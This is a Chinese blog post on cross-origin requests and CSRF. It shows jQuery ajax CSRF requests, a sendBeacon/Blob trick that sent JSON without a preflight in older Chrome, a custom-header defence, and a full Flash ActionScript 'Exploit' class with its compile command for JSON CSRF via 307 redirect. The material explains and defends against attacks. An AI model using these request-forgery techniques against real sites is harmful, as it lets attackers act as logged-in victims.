java csrf 跨域_使用javascript跨域请求与CSRF

最新推荐文章于 2023-11-06 22:14:34 发布
最新推荐文章于 2023-11-06 22:14:34 发布
阅读量236 收藏
点赞数
文章标签: java csrf 跨域
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35725559/article/details/114514479
版权

0x00 背景

同事在做CSRF的时候发现的。这里总结一下。

0x01 跨域的Simple Request

integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44="

crossorigin="anonymous">

$.ajax({

type: "POST",

url: "https://www.nevermoe.com",

data: "{hello}",

//contentType:"application/json; charset=utf-8",

//dataType:"json",

success: function(){

alert('success')

},

});

如果你使用上面这个script来post一个跨域的request到www.nevermoe.com,然后使用burp来查看浏览器的流量,你会发现,这个request虽然是跨域的,但是它确实被POST出去了,而且也得到了response。

f201b9a255924d9f37ec761ef188a0c1.png

954ccffdfccaf506168c6b6fc3fdbed5.png

但是在浏览器端,浏览器却不会将返回的数据进行渲染,因为浏览器发现response里并没有'Access-Control-Allow-Origin',所有浏览器默认会拒绝显示跨域请求。

5528568ee25e2cdac4d3a2d4b3eeed8d.png

虽然如此,但是显然我们的POST请求显然已经成功了,也就是说,如果用在csrf上已经足够了。

0x02 跨域的 Non-Simple Request -- 失败版

但是这里有个问题,刚刚的脚本我们发出去的request的Content-Type是'application/x-www-form-urlencoded; charset=UTF-8'、这种简单的(Simple)javascript的request(包括'text/plain')会被浏览器直接发送出去,但如果我们想发送json格式的跨域请求,其实是做不到的。可以把刚刚上面那段脚本的注释去掉试试,发现burp捕捉到的流量是这样的:

221b44c98677447704e9c5769c3d8d08.png

这不是一个POST请求,而是一个OPTIONS请求。这个是被浏览器替换掉掉请求。这个请求有个学名,叫做pre-flight request,是浏览器用来确认服务器的CORS设置的,当发出这个请求后,发现服务器的response里没有'Access-Control-Allow-Origin' Header,则浏览器不会把真正的POST request发出去。在chrome控制台里你会看到这样的错误:

6059615b03953a4188c965cf0d91b294.png

如此一来用javascript POST json格式似乎就不可能了。

0x03 跨域的 Non-Simple Request -- 成功版

这是同事发现的方法:在chrome下,用navigator.sendBeacon配合Blob可以跨域发送json的request。代码如下:

function jsonreq() {

var blob= new Blob([JSON.stringify({"hello":"world"})], {type : 'application/json; charset=UTF-8'}); // the blob

navigator.sendBeacon('https://www.nevermoe.com', blob )

}

jsonreq();

在chrome上这段代码不会发送pre-flight request,所以完全可以成功POST。如下:

1525744c28289d9b627317679422a6ba.png

注意,firefox上并不能成功,所以这是chrome的一个security bug,该bug从2015年开始被报告,但至今仍未fix。

(注:最新chrome已修复该bug,2017/09/01.)

0x05 扩展:防御CSRF

注意到,如果javascript想要发送一个Non-simple的request,那么一定会出发浏览器的pre-flight request,我们可以利用这一点来防止CSRF,比如使用json格式而非text/plain格式。但是在上面的chrome的bug中,即使使用json也是有危险的,我们可以使用强制发送自定request的header来防御CSRF:如果服务器收到的请求中没有自定义header(如X-Requested-With),则不处理该请求。如此一来,如果想要实现跨域javascript的请求,就必须写出如下js:

$.ajax({

type: "POST",

url: "https://www.nevermoe.com",

data: "{hello}",

headers: {'X-Requested-With': 'XMLHttpRequest'},

//contentType:"application/json; charset=utf-8",

//contentType:"text/plain",

//dataType:"json",

success: function(){

alert('success')

},

});

但是该js发送的请求是Non-simple的,浏览器看到这样的跨域请求会首先进行pre-flight请求,确定服务器是否允许跨域添加header。这时显然无法bypass CORS。

efb786898df5a2a77e99b1f423957781.png

这种实现方式有个明显的好处,就是是stateless的,程序员不需要花额外的精力维护csrf_token之类的东西,实现起来较为简单。

0x06 注意

如果想要令jquery的ajax同时发送cookie,必须像这样使用"withCredentials":

$.ajax({

url: a_cross_domain_url,

xhrFields: {

withCredentials: true

}

});

并且用户的浏览器没有禁止第三方cookie,且服务器没有禁止WithCredentials。

在android的webview上,第三方cookie的是否允许的设置是这样的:

"Apps that target KITKAT or below default to allowing third party cookies. Apps targeting LOLLIPOP or later default to disallowing third party cookies."

也就是说在高版本的android webview中,即使withCredentials为true,默认也是无法用javascript发送带cookie的跨域请求的。

0x07 更新 2017.05.17

使用html form生成json数据

使用如下的方法可以生成一个Content-Type是text/plain的请求,且body部分是一个类似json的parameter(最后多了一个=号)。

566d798c318021b1832b52f4a1468ae7.png

如果服务器端没有判断只接受Content-Type为application/json的请求,且接受=号结尾的json格式,这样的csrf仍能够成立。

padding

如果你对多出来的等号不满意,可以构造如下html:

0x08 更新 2017.09.12

其实如果你想把Content-Type设置为application/json,还是有办法的,可以使用flash+307 redirect来实现。具体参照这个网站:

https://woto.kim/json_csrf。

你可以通过反编译的他的flash文件来自己分析一下。

0x09 更新 2019.03.15

flash+307 redirect来实现csrf的方式现在仍然可以,但是只能改变Content-Type,如果想增加别的header话则会导致浏览器去请求目标网站的crossdomain.xml。从同事哪里得到的代码:

package {

import flash.net.*;

import flash.events.*;

import flash.display.*;

import flash.text.*;

import flash.display.MovieClip;

import flash.external.ExternalInterface;

public class Exploit extends MovieClip

{

public function Exploit()

{

var txt:TextField = new TextField();

txt.text = "Hello!";

txt.x = 20;

txt.y = 20;

addChild(txt);

var parent:Object = loaderInfo.parameters;

// ExternalInterface.call("alert", parent["data"]);

var req:URLRequest = new URLRequest(parent["url"]);

req.method = URLRequestMethod.POST;

var header:URLRequestHeader = new URLRequestHeader("Content-type", "application/json");

req.requestHeaders.push(header);

req.data = parent["data"];

var loader:URLLoader = new URLLoader();

loader.dataFormat = URLLoaderDataFormat.TEXT

loader.load(req);

// var header2:URLRequestHeader = new URLRequestHeader("X-Requested-With", "XMLHttpRequest");

// req.requestHeaders.push(header2);

//var header2:URLRequestHeader = new URLRequestHeader("X-Haru", "yes");

//req.requestHeaders.push(header2);

//loader.addEventListener(Event.COMPLETE, loaderCompleteHD);

//loader.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHD);

var txt2:TextField = new TextField();

txt2.text = "Hello!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!";

txt2.x = 20;

txt2.y = 20;

addChild(txt2);

}

}

}

编译:

mxmlc Exploit.as -static-link-runtime-shared-libraries=true

金酱酱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Django跨域请求CSRF的方法示例
01-20
web跨域请求 1.为什么要有跨域限制 举个例子: 1.用户登录了自己的银行页面 http://mybank.com,http://mybank.com向用户的cookie中添加用户标识。 2.用户浏览了恶意页面 http://evil.com。执行了页面中的恶意AJAX...
chrome扩展插件拦截修改请求头
BinByte的博客
09-24 8972
由于部分需求需要调用从三方抓包的来的接口取得一些数据,需要用谷歌扩展插件跨域请求三方接口,并携带部分头部信息,找了几个小时,终于找到了这个方法。某些浏览器添加以上代码后加载报 extraHeaders 错误,解决方法!(如果不报错就不必修改不然拦截会失效)
ByPass CORS
weixin_30301183的博客
07-05 84
Steps to avoid CORS in Dev environment. CORS and PreFlight.MDN In Dev environment, we can follow these steps to avoid this. 2.1 we can install a chrome extention with name Allow-Control-Allow-Origin...
XML(二)验证、XMLHttpRequest 、XML Parser 解析器、(跨浏览器)、利用DOM HTML JS写一个导航切换程序
qq_43456781的博客
08-16 229
XML(二)验证、XMLHttpRequest 、XML Parser 解析器、(跨浏览器)、利用DOM HTML JS写一个导航切换程序 文章目录XML(二)验证、XMLHttpRequest 、XML Parser 解析器、(跨浏览器)、利用DOM HTML JS写一个导航切换程序1. XML属性2. XML验证2.1 形式良好的 XML 文档2.2 验证 XML 文档2.3 XML DTD3. XMLHttpRequest 对象创建一个 XMLHttpRequest 对象4. XML Parser 解
网络-navigator.sendBeacon
smz的博客
10-11 2009
navigator.sendBeacon 是一个方便的浏览器 API,用于在页面卸载或关闭时发送异步请求,适用于发送统计数据、日志记录、表单提交等场景。
前端遇到302处理方式以及设置第三方Cookie研究
热门推荐
努力搬砖的博客
06-21 1万+
前端遇到302处理方式对比以及设置第三方Cookie研究
spring security中的csrf防御原理(跨域请求伪造)
08-25
CSRF(Cross-Site Request Forgery,跨域请求伪造)是一种网络攻击手段,攻击者利用受害者的身份在受害者的浏览器中发起对特定网站的非预期操作。这种攻击方式通常发生在用户已经登录某个受信任的网站之后,攻击者...
Web高级知识-跨域&XSS;&CSRF;解决方案
11-26
防范CSRF通常需要使用CSRF Token,这是一个随机生成的、一次性的令牌,服务器验证请求中包含的Token与预期相符才执行操作,从而避免伪造请求。 综上,理解HTTP协议的特性,特别是长连接与短连接的区别,对于优化...
Django中针对基于类的视图添加csrf_exempt实例代码
12-25
在Django中对于基于函数的视图我们可以 @csrf_exempt 注解来标识一个视图可以被跨域访问。那么对于基于类的视图,我们应该怎么办呢? 简单来说可以有两种访问来解决 方法一 在类的 dispatch 方法上使用 @csrf_exempt...
navigator.sendBeacon初步学习
最新发布
weixin_45013868的博客
11-06 320
有时业务需要需要采集用户的行为数据进行上报,此时使用navigator.sendBeacon是一个不错的选择。
csrf校验插件-js
05-03
使用该插件可以在使用js向后端提交数据时进行csrf校验
【JS】JS获取cookie里的csrftoken并添加到header里
10相濡以沫
08-18 3803
Django需要csrftoken来进行CSRF的防御 既然是前后端都自己写,肯定不能整@csrf_exempt这样的办法 JS用正则表达式获取cookie var regex = /.*csrftoken=([^;.]*).*$/ ; var xCSRFToken = document.cookie.match(regex) === null ? null : document.cookie.match(regex)[1] cookie的样式 Cookie: sessionid=tc3prqefkjt7
Navigator.sendBeacon()
Moon Star
06-28 1684
用户卸载网页的时候,有时需要向服务器发一些数据。很自然的做法是在unload事件或beforeunload事件的监听函数里面,使用XMLHttpRequest对象发送数据。但是,这样做不是很可靠,因为XMLHttpRequest对象是异步发送,很可能在它即将发送的时候,页面已经卸载了,从而导致发送取消或者发送失败。 解决方法就是 AJAX 通信改成同步发送,即只有发送完成,页面才能卸载。但是,很多浏览器已经不支持同步的 XMLHttpRequest 对象了(即open()方法的第三个参数为false)。
CSRF攻击时无法以Content-Type:Application/json来发送请求嘛?
weixin_42299862的博客
01-04 354
csrf利用
chrome:Request/Response Headers
weixin_30586085的博客
12-23 479
Request Headers Accept:告诉服务器,客户机支持的数据类型 Accept-Encoding:告诉服务器,客户机支持的数据压缩格式 Cache-Control:缓存控制,服务器通过控制浏览器要不要缓存数据 Connection:处理完这次请求,是断开连接还是保持连接 Cookie:客户机通过这个可以向服务器带数据 Host:访问的主机名 Upgrade-Insecu...
Android漏洞,WebView漏洞,Web漏洞与Web安全
ShareUs的专栏
03-16 2602
> Android漏洞 主要Android漏洞主要包括App反编译重打包、组件劫持漏洞、密码泄露、第三方库漏洞、WebView漏洞、系统服务漏洞。 Android 内存溢出与内存泄漏的简单分析与解决- http://blog.csdn.net/u014674558/article/details/62234008?ref=myread -- static引用泄露,将静态的改为软引用或非静态的...
探索埋点基本技术实现
Kaite_han的博客
04-30 731
1.为什么要探索 这纯属是我个人意愿,不想不明不白的使用一个东西,不求完全掌握,但想大概知道如何实现。刚进亚运项目小组,接到埋点任务,通过组内学习基本上明白了埋点API的使用,半懂半蒙的完成了埋点任务。 近期手上任务都提测了,闲下来想去探索探索我心中的几个疑问: 埋点是否会影响性能? 埋点是Ajax请求吗? 背后实现思想是什么? 2.如何探索? 本人没有技巧,混迹各种技术社区,俗称水群,总有大佬会说出一些你不知道的web规范、或者说新规范。其实是自己懒,不能想各种大佬一样每周都会去看看web mdn。
python爬虫模拟浏览器的headers、cookie,修改request的headers属性,跳过登录界面(注意淘宝的robots.txt不允许任何爬虫爬取,我们只在技术层面探讨这一章节的内容)
csdn_bajie
02-16 1854
淘宝商品信息定向爬虫 注意淘宝的robots.txt不允许任何爬虫爬取,我们只在技术层面探讨这一章节的内容。 完整版正则表达式的详细介绍见本人的这篇博客: 博客链接 功能描述: 目标:获取淘宝搜索页面的信息,提取其中的商品名称和价格 理解:淘宝的搜索接口 翻页的处理 技术路线:requests-re 起始页 https://s.taobao.com/search?q=%E4%B9%A6%E5%8C...
vue-resource系列之request.headers.set设置的问题
liuliuliu_666的博客
08-15 2067
vue-resource系列之request.headers.set设置的问题为什么设置请求头的过程中出现了问题? 为什么设置请求头的过程中出现了问题? 问题如下: Vue.http.interceptors.push((request, next) => { request.headers.set('lanId', 100); }) 项目运行的过程中,每个页面都会报如下错误: 后来在...
java 跨域 cookie_跨域请求传递Cookie问题
06-11
当浏览器发送跨域请求时,如果要携带 Cookie,需要满足以下两个条件: 1. 在请求头中设置 withCredentials 字段为 true; 2. 服务器端在响应头中设置 Access-Control-Allow-Origin 字段为具体的来源域名(不能使用通配符 *)。同时,还需要设置 Access-Control-Allow-Credentials 字段为 true,表示允许携带 Cookie。 以下是一个 Java 后端的示例代码: ``` @RequestMapping("/api") public void api(HttpServletRequest request, HttpServletResponse response) { // 设置允许跨域访问的域名 response.setHeader("Access-Control-Allow-Origin", "http://www.example.com"); // 允许携带 Cookie response.setHeader("Access-Control-Allow-Credentials", "true"); // 获取请求头中的 Cookie String cookie = request.getHeader("Cookie"); // 处理业务逻辑 // ... } ``` 需要注意的是,如果使用 Spring Security 等安全框架,还需要在配置中添加对跨域请求的支持。例如,在 Spring Security 中,可以添加如下配置: ``` http .cors() .and() .csrf().disable() .authorizeRequests() .anyRequest().permitAll(); ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值